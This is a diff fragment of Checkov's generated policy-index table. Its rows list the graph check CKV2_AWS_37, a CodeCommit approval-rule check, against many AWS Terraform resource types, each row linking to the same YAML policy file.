+|  985 | CKV2_AWS_37     | resource | aws_ram_principal_association                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  986 | CKV2_AWS_37     | resource | aws_ram_resource_association                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  987 | CKV2_AWS_37     | resource | aws_ram_resource_share                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  988 | CKV2_AWS_37     | resource | aws_ram_resource_share_accepter                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  989 | CKV2_AWS_37     | resource | aws_rds_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  990 | CKV2_AWS_37     | resource | aws_rds_cluster_endpoint                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  991 | CKV2_AWS_37     | resource | aws_rds_cluster_instance                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  992 | CKV2_AWS_37     | resource | aws_rds_cluster_parameter_group                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  993 | CKV2_AWS_37     | resource | aws_rds_global_cluster                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  994 | CKV2_AWS_37     | resource | aws_redshift_cluster                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  995 | CKV2_AWS_37     | resource | aws_redshift_event_subscription                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  996 | CKV2_AWS_37     | resource | aws_redshift_parameter_group                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  997 | CKV2_AWS_37     | resource | aws_redshift_security_group                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  998 | CKV2_AWS_37     | resource | aws_redshift_snapshot_copy_grant                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  999 | CKV2_AWS_37     | resource | aws_redshift_snapshot_schedule                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1000 | CKV2_AWS_37     | resource | aws_redshift_snapshot_schedule_association              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1001 | CKV2_AWS_37     | resource | aws_redshift_subnet_group                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1002 | CKV2_AWS_37     | resource | aws_resourcegroups_group                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1003 | CKV2_AWS_37     | resource | aws_root                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1004 | CKV2_AWS_37     | resource | aws_root_access_key                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1005 | CKV2_AWS_37     | resource | aws_route                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1006 | CKV2_AWS_37     | resource | aws_route53_delegation_set                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1007 | CKV2_AWS_37     | resource | aws_route53_health_check                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1008 | CKV2_AWS_37     | resource | aws_route53_query_log                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1009 | CKV2_AWS_37     | resource | aws_route53_record                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1010 | CKV2_AWS_37     | resource | aws_route53_resolver_endpoint                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1011 | CKV2_AWS_37     | resource | aws_route53_resolver_rule                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1012 | CKV2_AWS_37     | resource | aws_route53_resolver_rule_association                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1013 | CKV2_AWS_37     | resource | aws_route53_vpc_association_authorization               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1014 | CKV2_AWS_37     | resource | aws_route53_zone                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1015 | CKV2_AWS_37     | resource | aws_route53_zone_association                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1016 | CKV2_AWS_37     | resource | aws_route_table                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1017 | CKV2_AWS_37     | resource | aws_route_table_association                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1018 | CKV2_AWS_37     | resource | aws_s3_access_point                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1019 | CKV2_AWS_37     | resource | aws_s3_account_public_access_block                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1020 | CKV2_AWS_37     | resource | aws_s3_bucket                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1021 | CKV2_AWS_37     | resource | aws_s3_bucket_analytics_configuration                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1022 | CKV2_AWS_37     | resource | aws_s3_bucket_inventory                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1023 | CKV2_AWS_37     | resource | aws_s3_bucket_metric                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1024 | CKV2_AWS_37     | resource | aws_s3_bucket_notification                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1025 | CKV2_AWS_37     | resource | aws_s3_bucket_object                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1026 | CKV2_AWS_37     | resource | aws_s3_bucket_policy                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1027 | CKV2_AWS_37     | resource | aws_s3_bucket_public_access_block                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1028 | CKV2_AWS_37     | resource | aws_sagemaker_endpoint                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1029 | CKV2_AWS_37     | resource | aws_sagemaker_endpoint_configuration                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1030 | CKV2_AWS_37     | resource | aws_sagemaker_model                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1031 | CKV2_AWS_37     | resource | aws_sagemaker_notebook_instance                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1032 | CKV2_AWS_37     | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1033 | CKV2_AWS_37     | resource | aws_secretsmanager_secret                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1034 | CKV2_AWS_37     | resource | aws_secretsmanager_secret_rotation                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1035 | CKV2_AWS_37     | resource | aws_secretsmanager_secret_version                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1036 | CKV2_AWS_37     | resource | aws_security_group                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1037 | CKV2_AWS_37     | resource | aws_security_group_rule                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1038 | CKV2_AWS_37     | resource | aws_securityhub_account                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1039 | CKV2_AWS_37     | resource | aws_securityhub_member                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1040 | CKV2_AWS_37     | resource | aws_securityhub_product_subscription                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1041 | CKV2_AWS_37     | resource | aws_securityhub_standards_subscription                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1042 | CKV2_AWS_37     | resource | aws_service_discovery_http_namespace                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1043 | CKV2_AWS_37     | resource | aws_service_discovery_private_dns_namespace             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1044 | CKV2_AWS_37     | resource | aws_service_discovery_public_dns_namespace              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1045 | CKV2_AWS_37     | resource | aws_service_discovery_service                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1046 | CKV2_AWS_37     | resource | aws_servicecatalog_portfolio                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1047 | CKV2_AWS_37     | resource | aws_servicequotas_service_quota                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1048 | CKV2_AWS_37     | resource | aws_ses_active_receipt_rule_set                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1049 | CKV2_AWS_37     | resource | aws_ses_configuration_set                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1050 | CKV2_AWS_37     | resource | aws_ses_domain_dkim                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1051 | CKV2_AWS_37     | resource | aws_ses_domain_identity                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1052 | CKV2_AWS_37     | resource | aws_ses_domain_identity_verification                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1053 | CKV2_AWS_37     | resource | aws_ses_domain_mail_from                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1054 | CKV2_AWS_37     | resource | aws_ses_email_identity                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1055 | CKV2_AWS_37     | resource | aws_ses_event_destination                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1056 | CKV2_AWS_37     | resource | aws_ses_identity_notification_topic                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1057 | CKV2_AWS_37     | resource | aws_ses_identity_policy                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1058 | CKV2_AWS_37     | resource | aws_ses_receipt_filter                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1059 | CKV2_AWS_37     | resource | aws_ses_receipt_rule                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1060 | CKV2_AWS_37     | resource | aws_ses_receipt_rule_set                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1061 | CKV2_AWS_37     | resource | aws_ses_template                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1062 | CKV2_AWS_37     | resource | aws_sfn_activity                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1063 | CKV2_AWS_37     | resource | aws_sfn_state_machine                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1064 | CKV2_AWS_37     | resource | aws_shield_protection                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1065 | CKV2_AWS_37     | resource | aws_simpledb_domain                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1066 | CKV2_AWS_37     | resource | aws_snapshot_create_volume_permission                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1067 | CKV2_AWS_37     | resource | aws_sns_platform_application                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1068 | CKV2_AWS_37     | resource | aws_sns_sms_preferences                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1069 | CKV2_AWS_37     | resource | aws_sns_topic                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1070 | CKV2_AWS_37     | resource | aws_sns_topic_policy                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1071 | CKV2_AWS_37     | resource | aws_sns_topic_subscription                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1072 | CKV2_AWS_37     | resource | aws_spot_datafeed_subscription                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1073 | CKV2_AWS_37     | resource | aws_spot_fleet_request                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1074 | CKV2_AWS_37     | resource | aws_spot_instance_request                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1075 | CKV2_AWS_37     | resource | aws_sqs_queue                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1076 | CKV2_AWS_37     | resource | aws_sqs_queue_policy                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1077 | CKV2_AWS_37     | resource | aws_ssm_activation                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
